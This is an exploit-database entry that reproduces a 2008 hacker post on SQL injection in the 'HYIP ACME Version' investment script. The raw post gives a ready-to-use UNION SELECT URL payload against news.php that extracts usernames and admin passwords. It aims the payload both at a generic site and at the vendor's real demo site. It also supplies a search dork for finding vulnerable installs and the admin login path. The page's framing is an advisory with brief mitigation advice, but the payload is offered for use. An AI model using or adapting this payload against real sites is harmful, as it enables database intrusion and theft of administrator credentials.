header-logo
Suggest Exploit
vendor:
ACME Version
by:
Hussin X
N/A
CVSS
HIGH
SQL Injection
89
CWE
Product Name: ACME Version
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2008

HYIP ACME Version SQL Injection Vulnerability

The vulnerability allows an attacker to perform SQL injection attacks in the HYIP ACME Version software. By exploiting the vulnerability, an attacker can retrieve sensitive information from the database, such as usernames and admin passwords.

Mitigation:

To mitigate the vulnerability, it is recommended to apply the latest patch or update the software to a version that is not affected by the SQL injection vulnerability.
Source

Exploit-DB raw data:

########################################################
#
#    HYIP ACME Version  SQL Injection Vulnerability
#========================================================
#    Author: Hussin X                                   =
#                                                       =
#    Home :  www.tryag.cc/cc                            =
#                                                       =
#    email:  darkangel_g85[at]Yahoo[DoT]com             =
#            hussin.x[at]hotmail[DoT]com                =
#                                                       =
#========================================================
#    HomE script : http://www.ajsquare.com/
#     
#    Demo : http://www.ajhyip.com/demo/acme/index.php   
#    
#
#    DorK :  Copyright Acme 2008
#
#      
##########################################################

Exploit:   


http://www.site.com/[PaTs]/news.php?id=-1+union+select+null,null,concat_ws

(0x3a,username,admin_password),0x4861636B65645F42795F48757373696E5F58,null+from+admin

--



L!VE DEMO:

http://www.ajhyip.com/demo/acme/news.php?id=-1+union+select+null,null,concat_ws

(0x3a,username,admin_password),0x4861636B65645F42795F48757373696E5F58,null+from+admin

--


LogiN:

admin/index.php


################################################################################
####################################( Greetz )##################################
#                                                                              #
#      tryag / Mr.IraQ / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUAR /str0ke          #      

#                Silic0n  / Rafi / FAHD / Iraqihack                            #       

#                                                                              #
#################################(and All IRAQIs)###############################
################################################################################

# milw0rm.com [2008-06-21]